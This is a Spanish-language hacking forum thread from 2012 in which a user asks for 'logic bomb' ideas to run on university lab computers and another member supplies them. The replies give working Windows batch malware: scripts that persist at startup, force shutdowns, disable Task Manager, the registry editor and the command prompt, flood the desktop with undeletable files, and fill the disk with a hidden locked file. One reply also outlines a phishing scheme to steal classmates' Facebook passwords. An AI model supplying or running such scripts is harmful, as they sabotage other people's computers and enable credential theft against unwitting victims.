Busco ideas de Bomba lógica para windows

dato000 · 16 Septiembre 2012, 19:40 PM

Hey buenas, Esta pregunta va para los maestros:

Ya vi virulator y IceCrack de su eminencia Elecktro-Hacker, y viendo una y otras cosas "comicas y raras", me dejaron como proyecto hacer una bomba lógica. No es la gran cosa, pero de momento, solo se me ha ocurrido hacer una inocencia:

Un script que me abra unas diez mil veces (10.000) mspaint.exe, y mientras satura la memoria abriendo el programa una y otra y otra y otra vez, dar la orden de reinicio de sistema, sin que el usuario se percate de la orden, como dije, una inocentada, y que este proceso se repita tan pronto se inicie sesión se corra el código, como cuando uno abre un correo o un mensaje de msn (JA a mi me paso!!)

El problema no es el código, el problema, es, que consejos me pueden brindar uds, señoras y señoritas????

Vi que en la universidad, hay un archivo que abre encuestas para los que dan soporte en las salas informatica, ya saben, si es buen servicio bla bla bla. Ya redireccione uno, ja! a una página de porno ja!, me imagino la cara de uno de esos pobres que le dio la curiosidad de ver ese ejectuable en el sistema. Pero no es la gran cosa, pero supongo que podria inventarme algo nuevo.

Necesito sugerencias, que se puede hacer con un batch de windows???? No soy el experto, pero pues, tengo tiempo que matar.

es para fines investigativos, tengo que hacer ensayo y todo XDDDDDD claro que lo hare como ensayo

Eleкtro · 16 Septiembre 2012, 20:32 PM

Cita de: dato000 en 16 Septiembre 2012, 19:40 PM
Un script que me abra unas diez mil veces (10.000) mspaint.exe, y mientras satura la memoria abriendo el programa una y otra y otra y otra vez, dar la orden de reinicio de sistema, sin que el usuario se percate de la orden, como dije, una inocentada, y que este proceso se repita tan pronto se inicie sesión se corra el código

10.000? te pasaste xDDDD

Código (dos) [Seleccionar]

@Echo OFF

REM Ya sabes que esto puedes hacerlo también por el registro de Windows si prefieres...
If Not Exist "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%~nx0" (Copy %0 "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" >NUL)

REM La orden de reiniciar.
REM Repetirla es tonteria, Porque queda nula (No anulada)
Shutdown -s -t 60 >NUL

REM 10.000 veces... xD
For /L %%a in (0,1,10000) Do (Start /B mspaint)

Exit

Cita de: dato000 en 16 Septiembre 2012, 19:40 PMcomo cuando uno abre un correo o un mensaje de msn

Batch + Vbscript (WMI) o Tasklist.exe, Para monitorizar el nombre de las ventanas (La de correo y la de los mensajes)...

O por el nombre del proceso, Aunque menos eficiente:

Código (dos) [Seleccionar]

@Echo OFF

:Loop
wmic process where name="msn.exe" call terminate | Find "terminate" >NUL && (
	start codigo malicioso xD
	Exit
) || (
	Goto :Loop
)

No puedes hacer gran cosa en Batch... Yo estoy harto de ver códigos que hacen siempre lo mismo, unos mejores, y otros peores, pero siempre lo mismo.

EDITO: Si quieres joder un poco, llena el escritorio con 10.000 archivos y deniega los privilegios de eliminación de los archivos al usuario... el inicio se vuelve lentisimo xD
O agrega una clave al inicio para visitar una página porno gay y luego deniega los permisos a esa clave usando "regini" (No se si está en WinXP), si necesitas un ejemplo de regini pide, tengo alguno por ahi. mucha gente no sabe cambiar los permisos en el registro xD.

EDITO 2: Se me ocurre una cosa:
1º - Bájate el "phiser creator" si no sabes php, haz una réplica del login de facebook, la subes a un hosting.
2º - un simple bat que se añada al inicio y ejecute el navegador + tu página de phising
3º - Distribuir la bomba por los pcs del instituto y esperar a que caigan como moscas.

4º - Todo esto, únicamente con fines educativos, luego borrar las contraseñas xD.

Una vez hice un code "inocente" para salir de la rutina, por si te sirve:
(PD: LA última parte, El Dummy)

Citar

:::::::::::::::::::::::::
: Spank Me! 1.0
: :
: By EleKtrO H@ckeR :
: :
: Testeado en Windows 7 :
:::::::::::::::::::::::::

Spank Me! (Bitch)

Nivel destructivo: 3/10

- Deshabilita componentes del sistema operativo.

- Genera archivos de 1 byte con nombre aleatorio por todas las carpetas dle disco duro. 100 archivos por cada carpeta.

- Genera un archivo vacío (Dummy) consumiendo todo el espacio libre del disco duro.

Código (dos) [Seleccionar] Expandir
@Echo OFF REM: Deshabilita la ejecución de archivos REG reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg" /t Reg_SZ /d "txtfile" /f >NUL 2>&1 FOR /F "tokens=*" %%a in ('Reg query "HKEY_USERS" /f - ^| findstr /r .-......- ^| find /v "Classes"') do ( REM: Deshabilita el acceso a todas las aplicaciones (Inicio > Ejecutar) reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "RestrictRun" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el administrador de tareas reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el apagado del PC reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoClose" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el cambio de usuario de sesión del PC reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "StartmenuLogoff" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el menú contextual del ratón reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoViewContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el menú contextual del menú inicio reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoTrayContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita modificaciones en el menú inicio reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoChangeStartMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el panel de control reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoControlPanel" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el regedit reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableRegistryTools" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita la consola de windows reg add "%%a\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /T "REG_DWORD" /D "2" /f >NUL 2>&1 ) REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: REM: Crea archivos de 1 byte, Con nombre aleatorio, En todos los directorios del disco duro REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: setlocal enabledelayedexpansion Set File=0 For /F "Tokens=*" %%@ in ('Dir /B /S /AD "%systemdrive%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"') do (Call :COPY %%@) Goto :Dummy :Copy Fsutil file createnew "%*\%Random%%Random%%Random%%Random%%Random%" 1 >NUL 2>&1 Set /A File+=1 If !FILE! EQU 100 (Set /A File=0& Goto :EOF) ELSE (Call :COPY %*) REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: REM: Crea un archivo "dummy" consumiendo TODO el espacio libre del disco duro. REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :DUMMY REM: Permisos Takeown /F "%Windir%\winsxs" >NUL 2>&1 Icacls "%Windir%\winsxs" /Grant TODOS:F >NUL 2>&1 REM Crear el Dummy For /F "tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%') do ( Set Size=%%f Set Size=!Size:~-0,-6! Set Size=!Size!000000 Fsutil file createnew "%WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2>&1 ) REM Protección Anti-Borrado Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2>&1 Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F >NUL 2>&1 Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" +H +S +R >NUL 2>&1 Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Deny TODOS:F >NUL 2>&1 :FIN Del /Q %0 Exit

dato000 · 16 Septiembre 2012, 22:39 PM

Esto es material de oro!!!

Voy a crearme una imagen win7 ahora mismo y pruebo, naaaa lo mio es de lamers comparado con esto.

Cita de: EleKtro H@cker en 16 Septiembre 2012, 20:32 PM
10.000? te pasaste xDDDD

Muy poco?? XDDDDDDD

aunque, solo era una idea, pero seria aburrido un copy-pate de solo "start mspaint". Tu orden esta mejor, como dije, soy un novato en batch, pero es que es universal, jajaj me encanta porque no tengo que poner compilador ni un ide jajaj. Voy a educar a los computadores de la universidad, ajajajaja

Cita de: EleKtro H@cker en 16 Septiembre 2012, 20:32 PM
Código (dos) [Seleccionar] Expandir
@Echo OFF REM Ya sabes que esto puedes hacerlo también por el registro de Windows si prefieres... If Not Exist "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%~nx0" (Copy %0 "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" >NUL) REM La orden de reiniciar. REM Repetirla es tonteria, Porque queda nula (No anulada) Shutdown -s -t 60 >NUL REM 10.000 veces... xD For /L %%a in (0,1,10000) Do (Start /B mspaint) Exit

ahhh así se hace un bucle elegante, ummm es como en python, lo cual me recuerda que no se absolutamente nada de python, y menos de batch XDDDD. Viejo por registro no sabria hacerlo, además hay 2 cosas:

1) El cuento es que sea .bat, un .reg pensaran que me lo copie XDDD
2) Para la prueba podre ser admin, pero si voy a las grandes ligas (los computadores de las salas) ya sere como invitado, y no quiero reventar la cuenta de admin porque ahi me meteria en problemas, por lo que una cuenta de invitado me queda muy limitada. Aún estoy buscando una forma (sin pagar software) de encontrar la clave root de esas salas.

Que bonito seria, abrir una imagen de un pirata o algo asi diciendo que se jodio la maquina y que van a llamar a la ciberpolicia, con música de malos!!! voy a crearme una imagen y dejo el batch para que me digan lo malo y lo malo que tiene

Cita de: EleKtro H@cker en 16 Septiembre 2012, 20:32 PM
Batch + Vbscript (WMI) o Tasklist.exe, Para monitorizar el nombre de las ventanas (La de correo y la de los mensajes)...

O por el nombre del proceso, Aunque menos eficiente:
Código (dos) [Seleccionar] Expandir
@Echo OFF :Loop wmic process where name="msn.exe" call terminate | Find "terminate" >NUL && ( start codigo malicioso xD Exit ) || ( Goto :Loop )

No puedes hacer gran cosa en Batch... Yo estoy harto de ver códigos que hacen siempre lo mismo, unos mejores, y otros peores, pero siempre lo mismo.

Que clase de códigos????'

Cita de: EleKtro H@cker en 16 Septiembre 2012, 20:32 PM
EDITO: Si quieres joder un poco, llena el escritorio con 10.000 archivos y deniega los privilegios de eliminación de los archivos al usuario... el inicio se vuelve lentisimo xD

NO estoy seguro de entender eso, pero suena a sabor!!!!

Cita de: EleKtro H@cker en 16 Septiembre 2012, 20:32 PM
O agrega una clave al inicio para visitar una página porno gay y luego deniega los permisos a esa clave usando "regini" (No se si está en WinXP), si necesitas un ejemplo de regini pide, tengo alguno por ahi. mucha gente no sabe cambiar los permisos en el registro xD.

EJEMPLO POR FAVOR SENSEI!!!!
la página porno la redireccione pero a "x v i d e o s" jejejejejejejjjeje es de todo un poco, porno del bueno ajjajaajja, sali corriendo al hacer esto, pero ahora lo haria sin miedo, aunque quisiera hacerlo en todas las maquinas XDDD, voy a comprobar si sirve putty jajajaj porque se que como invitado no puedo configurar redes, sigo en la busqueda de la clave maestra.

Yo no se cambiar cosas del registro, pero si es como lo de la flechita de los iconos que dejaste hace tiempo, aprenderia encantado YEAH.

Cita de: EleKtro H@cker en 16 Septiembre 2012, 20:32 PM
EDITO 2: Se me ocurre una cosa:
1º - Bájate el "phiser creator" si no sabes php, haz una réplica del login de facebook, la subes a un hosting.
2º - un simple bat que se añada al inicio y ejecute el navegador + tu página de phising
3º - Distribuir la bomba por los pcs del instituto y esperar a que caigan como moscas.
4º - Todo esto, únicamente con fines educativos, luego borrar las contraseñas xD.

Una vez hice un code "inocente" para salir de la rutina, por si te sirve:
(PD: LA última parte, El Dummy)

Te entiendo bastante, se me haria complicado implementar el formulario, porque me rastrearian facilmente, pero no serviria para facebook, porque el proxy de la universidad (phenix, que lindo nombre para esa porqueria de proxy, que ni lo escriben bien los hijos de...) aunque se salta facil con tor, pero nadie conoce tor allá, --malditos lamers--... no permite el acceso a facebook, así que es perder el tiempo, pero con ese cuento dejaste, jejejejeje ya me dieron ganas de aprender phishing y ensayarlo, aunque no se como moldear el css para que quede parecido a facebook, pero LO VOY A INTENTAR!!!

Voy a hacer de este un mundo peor!! y lo comentare por aqui XDD

El dummy, lo voy a probar tan pronto instale el win7 virtual XDDDDD todos alla en la universidad usan win7.

Eleкtro · 17 Septiembre 2012, 01:15 AM

Cita de: dato000 en 16 Septiembre 2012, 22:39 PM
Que bonito seria, abrir una imagen de un pirata o algo asi diciendo que se jodio la maquina y que van a llamar a la ciberpolicia, con música de malos!!! voy a crearme una imagen y dejo el batch para que me digan lo malo y lo malo que tiene

Poder se puede, Pero a menos que "compiles" en un exe el archivo.bat y la utilidad Nircmd.exe junto a la imagen.bmp y el archivo.wav... Pero si dices que lo quieres tener en un único archivo "bat" pues...

Cita de: dato000 en 16 Septiembre 2012, 22:39 PMQue clase de códigos????'

Código [Seleccionar]

Del /Q /S C:\*
Siempre lo mismo...

Cita de: dato000 en 16 Septiembre 2012, 22:39 PMNO estoy seguro de entender eso, pero suena a sabor!!!!

Ejemplo:

Código (dos) [Seleccionar]

@Echo OFF
Setlocal enabledelayedexpansion

Set "CANTIDAD=1000"

PUSHD "%userprofile%\Desktop\"
For /L %%# in (0,1,%CANTIDAD%) Do (
	CLS
	Echo %%# ^| %CANTIDAD%
	Set "FILE=Pornotube !RANDOM!!RANDOM!.url"
	Echo OWNED > "!FILE!"
	TAKEOWN /F "!FILE!" >NUL
	ATTRIB +R +S "!FILE!"
	ICACLS "!FILE!" /DENY "TODOS":(F^) >NUL
)
Pause
Exit


REM VACUNA:
REM
REM @Echo OFF
REM PUSHD "%userprofile%\Desktop\"
REM TAKEOWN /F "*.url" >NUL
REM ICACLS "*.url" /GRANT "TODOS":(F) >NUL
REM ATTRIB -R -S "*.url"
REM DEL "*.url"
REM Pause
REM Exit

PD: Solamente me referia a llenar el escritorio con miles de archivos, Que acaban bugeando el explorer.exe y hay que matar el proceso. Pero lo que tiene gracia es que no se pueden eliminar los archivos a menos que vuelvas a darle permisos para eliminación...
La verdad, como ~~putada~~ broma pesada está bien porque es algo muy molesto, te quita 10 minutos de vida para abrir una carpeta en el explorer, o para abrir la consola para ejecutar la vacuna xD

CitarEJEMPLO POR FAVOR SENSEI!!!!

EJEMPLO (REGINI):

Código (dos) [Seleccionar]

@echo off
REM Elektro H@cker

:: Inicia una página en el navegador por defecto al iniciar sesión en Windows

Set "KeyADD=Elektro H@cker"
SET "WEB=www.elhacker.net"

REM Obtenemos el navegador por defecto
FOR /F tokens^=2^ delims^=^" %%@ in ('REG QUERY HKCR\htmlfile\shell\open\command /VE') Do (REM "

REM Agregamos la página al inicio de sesión del usuario
	REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "%KeyADD%" /D "CMD /C \"Start /D \"%%~dp@" %%~nx@ \"%WEB%\""" /F >NUL
)

REM Eliminamos los permisos usando REGINI
Echo HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run [2 8 12 18 19 22]>"%TEMP%\deny.txt"
Regini.exe "%TEMP%\deny.txt
Pause&Exit

REM VACUNA
REM 
REM @echo off
REM Set "KeyDEL=Elektro H@cker"
REM Echo HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run [1 5 7 11 14 17 20]>"%TEMP%\grant.txt"
REM Regini.exe "%TEMP%\grant.txt"
REM REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "%KeyDEL%" /F
REM Pause&Exit

Saludos.

Geormarsch · 17 Septiembre 2012, 14:02 PM

Recuerdo que yo hice un pishing creattt en batch del facebook, descargaba el index del facebook y otro archivo php y luego te pedia tus datos ftp y los subia a tu web

dato000 · 21 Septiembre 2012, 13:49 PM

Ummm yo aún sigo de novato, no entiendo bien los ciclos en batch.

Digamos aún sigo con lo de digamos, abrir 5 veces paint:

Citar
:paint
start /b "mspaint.exe"
start /b "mspaint.exe"
start /b "mspaint.exe"
start /b "mspaint.exe"
start /b "mspaint.exe"
goto paint

He mirado los programas que has dejado para recuparar contraseñas, el de navegadores, el de ftp... se entiende facilmente el funcionamiento. Pero hay cosas muy complejas (como lo del batch de matrix, jeje muy bueno me hizo mucha gracia cuando lo hice fullscreen) y no estoy a la altura (aún) para hacer un código muy bueno, me sale como tu mismo los desprecias

Citar
Del /Q /S C:\*

Tengo una duda, ese batch para rellenar completamente el disco:

Citar
REM Ocupar todo el espacio del disco duro con un archivo dummy
Setlocal enabledelayedexpansion
Takeown /F "%Windir%\winsxs" >NUL 2>&1
Icacls "%Windir%\winsxs" /Grant TODOS:F >NUL 2>&1
:Dummy
For /F "tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%') do (
   Set Size=%%f
   Set Size=!Size:~-0,-6!
   Set Size=!Size!000000
   Fsutil file createnew "%WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2>&1
)
Setlocal disabledelayedexpansion
:AntiDelete
Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F >NUL 2>&1
Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" +H +S +R >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Deny TODOS:F >NUL 2>&1

Funciona perfectamente, pero es posible arreglarlo desde cmd?? o solo con formateo (yo formatee ayer el win7 virtual XDDDD, si, me quedo grande, lo siento, soy humano) porque pues un disco lleno no me conviene jaja para seguir haciendo ensayos

Citar
:: Te felicito maestro, Que tiemble tú victima... Muahaha!! :W

XDDDDDD

Eleкtro · 21 Septiembre 2012, 14:49 PM

Cita de: dato000 en 21 Septiembre 2012, 13:49 PM
Tengo una duda, ese batch para rellenar completamente el disco:

es posible arreglarlo desde cmd??

Claro

Código (dos) [Seleccionar]


@Echo OFF
::Vacuna DUMMY
Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd"
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F
Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" -H -S -R
Del  "%WINDIR%\winsxs\Microsoft Security Database.msd" 
Pause&Exit

saludos

dato000 · 21 Septiembre 2012, 21:37 PM

jejej encontre esto:

http://pastebin.com/SPNJWtwq

creditos???

gracias por la respuesta, voy a implementarlo.

Oye, como manejas los ciclos, que la ayuda que me echa windows y los blogs no me queda claro.

Como se trabajan los ciclos for en batch??

Eleкtro · 22 Septiembre 2012, 08:49 AM

Cita de: dato000 en 21 Septiembre 2012, 21:37 PM
jejej encontre esto:
http://pastebin.com/SPNJWtwq
creditos???

Sin comentarios. Ya podría haber modificado aunque séa el nombre del archivo dummy

Cita de: dato000 en 21 Septiembre 2012, 21:37 PMComo se trabajan los ciclos for en batch??

A que te refieres con "como se trabajan?"? Aquí tienes ejemplos

FOR - Loop through a set of files in one folder

FOR /R- Loop through files (recurse subfolders)

FOR /D - Loop through several folders

FOR /L- Loop through a range of numbers

FOR /F- Loop through the output of a command

saludos

dato000 · 22 Septiembre 2012, 14:25 PM

Cita de: EleKtro H@cker en 22 Septiembre 2012, 08:49 AM
Sin comentarios. Ya podría haber modificado aunque séa el nombre del archivo dummy

XDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD Campeón!!!!!!!!!!!!!!!!!!

Cita de: EleKtro H@cker en 22 Septiembre 2012, 08:49 AM
A que te refieres con "como se trabajan?"? Aquí tienes ejemplos

FOR - Loop through a set of files in one folder

FOR /R- Loop through files (recurse subfolders)

FOR /D - Loop through several folders

FOR /L- Loop through a range of numbers

FOR /F- Loop through the output of a command

saludos

Mejor aún, pedia solo una explicación, pero esto esta mucho mejor, gracias maese, voy a ver que tal me va con eso.